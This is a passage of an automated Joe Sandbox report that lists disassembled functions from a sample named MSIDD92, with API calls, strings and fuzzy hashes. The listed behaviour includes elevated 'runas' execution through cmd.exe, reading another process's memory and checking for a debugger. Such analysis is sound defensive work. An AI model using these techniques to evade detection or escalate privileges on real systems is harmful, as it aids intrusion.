                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _strrchr
                                                                      • String ID:
                                                                      • API String ID: 3213747228-0
                                                                      • Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                      • Instruction ID: 9b07df78de91f85cf5d5c02a550b8f93a2f42d29cd1ebf0acd32cafaa4633253
                                                                      • Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                      • Instruction Fuzzy Hash: 7AB12572D002459FDB118F68C8917EEBBA5EF5A320F18816BE845AB243D375DD02CBB0
                                                                      Function 00D983BD Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D983C9
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00D98495
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D984B5
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00D984BF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                      • String ID:
                                                                      • API String ID: 254469556-0
                                                                      • Opcode ID: 5354cf74d4906503f07c1e6f04f96b6d26a4417234aeef3992c54051cc97b42f
                                                                      • Instruction ID: 4f2789861a15293562cd7433f0462248672ba3188a577463a74519a5d93b75b7
                                                                      • Opcode Fuzzy Hash: 5354cf74d4906503f07c1e6f04f96b6d26a4417234aeef3992c54051cc97b42f
                                                                      • Instruction Fuzzy Hash: F1311875D01319DBDF10EFA4D989BCDBBB8AF09700F1041AAE40DAB250EB719A849F64
                                                                      Function 00D82161 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00D73270,?), ref: 00D82176
                                                                      • FormatMessageA.KERNEL32(00001300,00000000,862265DA,00000000,00000000,00000000,00000000,?,?,?,00D73270,?), ref: 00D82198
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FormatInfoLocaleMessage
                                                                      • String ID: !x-sys-default-locale
                                                                      • API String ID: 4235545615-2729719199
                                                                      • Opcode ID: 9efec3b980b7a140a5f42327f246874e36db5aacc0331c8f01c1027f51bf46ba
                                                                      • Instruction ID: 9e44b8dc49579cb52f5be6322534cff60b336e5a97b7f9f0baf5eccc6afaf26e
                                                                      • Opcode Fuzzy Hash: 9efec3b980b7a140a5f42327f246874e36db5aacc0331c8f01c1027f51bf46ba
                                                                      • Instruction Fuzzy Hash: 9AE039B6550218FEEB04AFA5CC0BDFA7B6DEB04790F104114B902D2180E2B06E008BB0
                                                                      Function 00D77660 Relevance: 42.4, APIs: 16, Strings: 8, Instructions: 384libraryloadersleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 395 d77660-d776cb 396 d776cc-d77728 call d78530 call d72100 * 2 call d77db0 395->396 404 d7772e-d7773d 396->404 405 d77a7b-d77aac call d71910 GetWindowThreadProcessId 396->405 406 d7773f-d77747 call d72750 404->406 407 d7774a-d77760 call da0d39 404->407 412 d77ae1-d77ae8 405->412 413 d77aae-d77ade GetWindowLongW 405->413 406->407 407->405 416 d77766-d77796 call d72100 407->416 419 d777a0-d777a4 416->419 420 d77798-d7779b 416->420 421 d77855-d778a2 419->421 422 d777aa-d777af 419->422 420->419 424 d778a4-d778aa GetForegroundWindow 421->424 425 d778ad-d778af 421->425 423 d777b1-d777b7 422->423 428 d777d7-d777d9 423->428 429 d777b9-d777bc 423->429 424->425 426 d778b1-d778bb call d77af0 425->426 427 d778bd-d778cc ShellExecuteExW 425->427 426->427 431 d778ce-d778d9 call d77c30 427->431 432 d778dc-d778de 427->432 435 d777dc-d777de 428->435 433 d777d3-d777d5 429->433 434 d777be-d777c6 429->434 431->432 440 d77912-d77932 call d77ef0 432->440 441 d778e0-d778e6 432->441 433->435 434->428 442 d777c8-d777d1 434->442 436 d77816-d77852 GetWindowsDirectoryW call d71980 * 2 435->436 437 d777e0-d777e5 435->437 436->421 443 d777e7-d777ed 437->443 454 d779cb-d779d0 440->454 455 d77938-d7795e GetModuleHandleW GetProcAddress AllowSetForegroundWindow 440->455 446 d778ed-d77907 ShellExecuteExW 441->446 447 d778e8-d778eb 441->447 442->423 442->433 449 d777ef-d777f2 443->449 450 d7780d-d7780f 443->450 446->440 452 d77909-d7790d call d77c30 446->452 447->440 447->446 456 d777f4-d777fc 449->456 457 d77809-d7780b 449->457 458 d77812-d77814 450->458 452->440 463 d779f2-d77a12 call d77d30 454->463 464 d779d2-d779da 454->464 455->454 469 d77960-d77967 455->469 456->450 461 d777fe-d77807 456->461 457->458 458->421 458->436 461->443 461->457 470 d77a14-d77a17 463->470 471 d77a1c-d77a2d 463->471 464->463 467 d779dc-d779ec WaitForSingleObject GetExitCodeProcess 464->467 467->463 469->454 472 d77969-d77982 GetModuleHandleW GetProcAddress 469->472 470->471 473 d77a37-d77a4c 471->473 474 d77a2f-d77a32 471->474 475 d77984-d7798c 472->475 476 d779c8 472->476 477 d77a56-d77a7a call d97708 473->477 478 d77a4e-d77a51 473->478 474->473 481 d77990-d77993 475->481 476->454 478->477 481->476 483 d77995-d779bf Sleep EnumWindows 481->483 483->481 484 d779c1-d779c2 BringWindowToTop 483->484 484->476
                                                                      APIs
                                                                      • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00D7781F
                                                                      • GetForegroundWindow.USER32(?,?), ref: 00D778A4
                                                                      • ShellExecuteExW.SHELL32(?), ref: 00D778C1
                                                                      • ShellExecuteExW.SHELL32(?), ref: 00D778FF
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00D77942
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00D77949
                                                                      • AllowSetForegroundWindow.USER32(00000000), ref: 00D77953
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00D77973
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00D7797A
                                                                      • Sleep.KERNEL32(00000064,?,?,?), ref: 00D77997
                                                                      • EnumWindows.USER32(00D77A90,?), ref: 00D779B3
                                                                      • BringWindowToTop.USER32(?), ref: 00D779C2
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00D779DF
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00D779EC
                                                                        • Part of subcall function 00D77D30: CloseHandle.KERNEL32(?,862265DA,00000010,00000010,?,?), ref: 00D77D72
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00D77A9C
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00D77AB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                      • API String ID: 1023610922-986041216
                                                                      • Opcode ID: 5a3b2eabdcdf229e6efe0f0b09ca9fe4cd8dc52d3be14e3ec793bb18fd61f936
                                                                      • Instruction ID: 12c57786f11184dfca322beecc2d796e333b36cb7a8efdcf83e5192827e96019
                                                                      • Opcode Fuzzy Hash: 5a3b2eabdcdf229e6efe0f0b09ca9fe4cd8dc52d3be14e3ec793bb18fd61f936
                                                                      • Instruction Fuzzy Hash: 89E18F71A04249DFDB10DFA8C889AAEB7B5FF14310F188669E519EB291EB31D905CF70
                                                                      Function 00D78790 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 349filememoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00D7880D
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00D78860
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D7886F
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00D7888B
                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D7896B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D78977
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D789B3
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D789D2
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D789EF
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D78A83
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00D78ACE
                                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00D78B1C
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00DBA285,000000FF), ref: 00D78B4B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                      • API String ID: 2199533872-3004881174
                                                                      • Opcode ID: 537d29e61973d19469242fa1df840e1572d5bf01fd90689f80283c3112b63fd3
                                                                      • Instruction ID: 8fc5e2568d457a5ca1b9b93225285a79dcb750b62123429d49c2799e6536e647
                                                                      • Opcode Fuzzy Hash: 537d29e61973d19469242fa1df840e1572d5bf01fd90689f80283c3112b63fd3
                                                                      • Instruction Fuzzy Hash: 85C1F471940245DFEB209F68CC49BAFBBB5EF54700F18812AE5099B2C1FB748905DBB2
                                                                      Function 00D97769 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00DD4AF8,00000FA0,?,?,00D97747), ref: 00D97775
                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00D97747), ref: 00D97780
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00D97747), ref: 00D97791
                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D977A3
                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D977B1
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00D97747), ref: 00D977D4
                                                                      • DeleteCriticalSection.KERNEL32(00DD4AF8,00000007,?,?,00D97747), ref: 00D977F0
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00D97747), ref: 00D97800
                                                                      Strings
                                                                      • SleepConditionVariableCS, xrefs: 00D9779D
                                                                      • kernel32.dll, xrefs: 00D9778C
                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D9777B
                                                                      • WakeAllConditionVariable, xrefs: 00D977A9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 2565136772-3242537097
                                                                      • Opcode ID: 1262429e27227e95c0759fc6a91188c407d2eec74a5c983ad635bbebe2829c7f
                                                                      • Instruction ID: 7840981c8fb7165d163fa46aa56ecbba607f6a3671345d2001c075cc64c26412
                                                                      • Opcode Fuzzy Hash: 1262429e27227e95c0759fc6a91188c407d2eec74a5c983ad635bbebe2829c7f
                                                                      • Instruction Fuzzy Hash: E5017575795711EFDB212F74AC0DE563769AF45B51F090116F805D7390EBB0C8048675
                                                                      Function 00D7F010 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000018,862265DA,?,00000000), ref: 00D7F076
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7F0B3
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7F11D
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7F2B9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7F376
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00D7F39E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 975656625-1062449267
                                                                      • Opcode ID: ba90e45360df8a7609fb9882c9a15bea123267efc00b3fda02c624d05b98c252
                                                                      • Instruction ID: ac0775bff3a1a75c82da179d9d8196ab6859d62f6294fd2cbb9c76f7204f9852
                                                                      • Opcode Fuzzy Hash: ba90e45360df8a7609fb9882c9a15bea123267efc00b3fda02c624d05b98c252
                                                                      • Instruction Fuzzy Hash: 27B182B1D00348DEEB21DFA4C945BDEBBF4EF14304F1481A9E448AB282E7759A48CB71
                                                                      Function 00D76A60 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,862265DA,?,00000000), ref: 00D76AC2
                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,862265DA,?,00000000), ref: 00D76AE3
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,862265DA,?,00000000), ref: 00D76B16
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,862265DA,?,00000000), ref: 00D76B27
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76B45
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76B61
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76B89
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76BA5
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76BC3
                                                                      • CloseHandle.KERNEL32(00000000,?,862265DA,?,00000000), ref: 00D76BDF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$Process$OpenTimes
                                                                      • String ID:
                                                                      • API String ID: 1711917922-0
                                                                      • Opcode ID: 431638078960712a2a92ccc601575f7f51ba910b519570f042c211afae199e4f
                                                                      • Instruction ID: 2075fde4c0c93fd0708221892a0c4a0a531aae6234935edfd121fa8386501d9e
                                                                      • Opcode Fuzzy Hash: 431638078960712a2a92ccc601575f7f51ba910b519570f042c211afae199e4f
                                                                      • Instruction Fuzzy Hash: 8A514C70D01618EBDB10DF98C988BEEFBB5AB49724F248219E518B7380E7749905CBB4
                                                                      Function 00D90834 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D9083B
                                                                        • Part of subcall function 00D8780A: __EH_prolog3.LIBCMT ref: 00D87811
                                                                        • Part of subcall function 00D8780A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
                                                                        • Part of subcall function 00D8780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1538362411-2891247106
                                                                      • Opcode ID: ec3c593fdfb286ff9e2a71b9f40e830ed91067ab712e54aa934b74e2ab4a918b
                                                                      • Instruction ID: 9c6901155f38c708b7c40acc800ea31da0b3e1a61ed98d022c41042b11bc72f9
                                                                      • Opcode Fuzzy Hash: ec3c593fdfb286ff9e2a71b9f40e830ed91067ab712e54aa934b74e2ab4a918b
                                                                      • Instruction Fuzzy Hash: 00C1707254020AAFDF18EF98D9A5DFA7FADEB09318F184519FA42E7251D630DA00CB70
                                                                      Function 00D959E2 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D959E9
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                        • Part of subcall function 00D7C590: std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                        • Part of subcall function 00D7C590: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 80c3096b1246641050e0026237c9803415fdbd4f81145507e2ddaeea18952fad
                                                                      • Instruction ID: 29bb4728243376cd4ccd96f7e187554da74f72bc94d4abb152b2235875f002d3
                                                                      • Opcode Fuzzy Hash: 80c3096b1246641050e0026237c9803415fdbd4f81145507e2ddaeea18952fad
                                                                      • Instruction Fuzzy Hash: CEC1A576500609AFDF1ADF98E999EFB3BB8EB05304F144529FA42A7259D631DA00CB70
                                                                      Function 00D90C24 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D90C2B
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                        • Part of subcall function 00D7B500: std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                        • Part of subcall function 00D7B500: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 6566fe9206c1bbe492efa417b82d520f6416d3054eaf21c1e1d62cdaaef7c3c0
                                                                      • Instruction ID: ba8c12d0d61528c5a1fe20206a8ef9a8e9aae0c421b19a6979c5d20f1295830c
                                                                      • Opcode Fuzzy Hash: 6566fe9206c1bbe492efa417b82d520f6416d3054eaf21c1e1d62cdaaef7c3c0
                                                                      • Instruction Fuzzy Hash: 2EC15D7650010AAFDF28DFA8D995DFF7FA9EF09300F18451AFA46A6251D630DA14CB70
                                                                      Function 00D765B0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 258libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00D76090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00D760F4
                                                                        • Part of subcall function 00D76090: GetLastError.KERNEL32 ref: 00D76190
                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00D76632
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00D7668B
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00D76712
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00D767F6
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00D7686E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00D768C9
                                                                      • FreeLibrary.KERNEL32(?,?,00000000), ref: 00D7691E
                                                                      Strings
                                                                      • NtQueryInformationProcess, xrefs: 00D7662C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
